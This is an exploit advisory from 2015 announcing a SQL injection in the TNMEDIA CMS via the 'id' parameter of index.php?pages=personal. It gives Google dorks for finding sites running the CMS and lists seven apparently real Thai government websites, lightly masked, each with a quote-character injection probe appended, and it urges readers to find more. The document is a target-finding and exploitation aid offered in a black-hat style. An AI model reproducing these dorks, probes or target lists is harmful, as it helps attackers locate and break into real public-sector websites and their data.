#########################################
Exploit Title : TNMEDIA Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage: http://www.tnmediasystem.com/index.php
Google Dork 1 : Powered by TNMEDIA
Google Dork 2 : inurl:/index.php?pages=personal id= intext:Powered by TNMEDIA
Date : 19 / 3 / 2015
Tested On : windows se7en + linux Kali
#########################################
#########################################
~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~~ ~~ ~ ~~>
Location <~ ~ ~
WEBSITE/index.php?pages=personal&id=[SQL]
~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> DEMO
<~ ~ ~
http://charoenmuanXg.go.th/index.php?pages=personal&id=6'
http://www.rimkokX.go.th/index.php?pages=personal&id=4'
http://www.sanmXaka.go.th/index.php?pages=personal&id=5'
http://www.maeXjd.go.th/index.php?pages=personal&id=12'
http://www.pongphrXae.go.th/index.php?pages=personal&id=7'
http://www.muangXphanlocal.go.th/index.php?pages=personal&id=5'
http://www.paoorXdonchai.go.th/index.php?pages=personal&id=8'
And Google More . . .
#########################################
#########################################
Discovered by : SeRaVo.BlackHat [*] H.4.S.S.4.N [*]
#########################################
#########################################